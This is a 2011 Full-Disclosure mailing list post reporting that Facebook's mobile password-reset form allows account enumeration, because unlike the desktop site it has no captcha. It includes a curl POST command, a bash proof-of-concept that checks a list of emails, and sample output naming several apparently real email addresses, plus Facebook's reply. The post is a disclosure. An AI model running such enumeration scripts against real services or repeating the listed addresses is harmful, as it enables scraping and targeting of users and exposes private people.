-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Facebook doesn't ensures the user information may not be collected by any bot or any automated process. Even though you can protect from this kind of attacks using captchas or tokens security into the forms. Step by step: - - Go to http://m.facebook.com - - Go to "Forgot your password" (http://m.facebook.com/reset.php?refid=0) - - Try using a real email address and try to use a fake email address, you will see two differents behavior. Well, now try to do a POST request to http://m.facebook.com/reset.php?refid=0 passing a email address through "ep" variable. Using cURL: curl -s -d "ep=test@mail.com" http://m.facebook.com/reset.php?refid=0 This process has no validation for external or forgery site/form. Using the script: #-------------------- #!/bin/bash for mail in $(cat $1); do s=$(curl -s -d "ep=$mail" http://m.facebook.com/reset.php?refid=0|grep form>/dev/null); if [ $? -eq 0 ]; then echo "$mail No tiene cuenta."; else echo "$mail Si tiene cuenta."; fi done #+----- EOF ------+ You can ennumerate users by using a list of email address or phone numbers. $ sh poc.sh mails.txt putita666@yahoo.com NO chapalapachala@gmail.com YES esteban.gutierrez@gmail.com YES casatola@gmail.com YES casacasa@gmail.com NO berpnarf@hotmail.com NO asdfgsdfgerT@asdfgh.com NO Into the full version of facebook http://www.facebook.com this option is protected by a captcha to verify that we are human, in the mobile, version this validation doesn't exists. Facebooks says: [copy&paste] "Hi, While this style of information disclosure vulnerability may be applicable at a financial or banking website, it is a core part of the experience on social networks that are designed to connect email addresses to users. As another example, someone who desires to obtain this type of information could first load all of the email addresses into a throw-away email address book, and then utilize our contact importer tool. Requiring the registration of an account would not provide any significant additional friction. Alex Security Facebook" Details in http://www.securitybydefault.com/2011/08/busqueda-automatizada-de-cuentas.html Cheers, - -- Zerial Seguridad Informatica GNU/Linux User #382319 Blog: http://blog.zerial.org Jabber: zerial@jabberes.org -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.11 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iEYEARECAAYFAk44HXUACgkQIP17Kywx9JTfzwCgmpOtiEirsLQhWBON05rbVNtH XskAnAzjwC8gMJgajSUyEW7J7rxfjCZL =hGpN -----END PGP SIGNATURE----- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/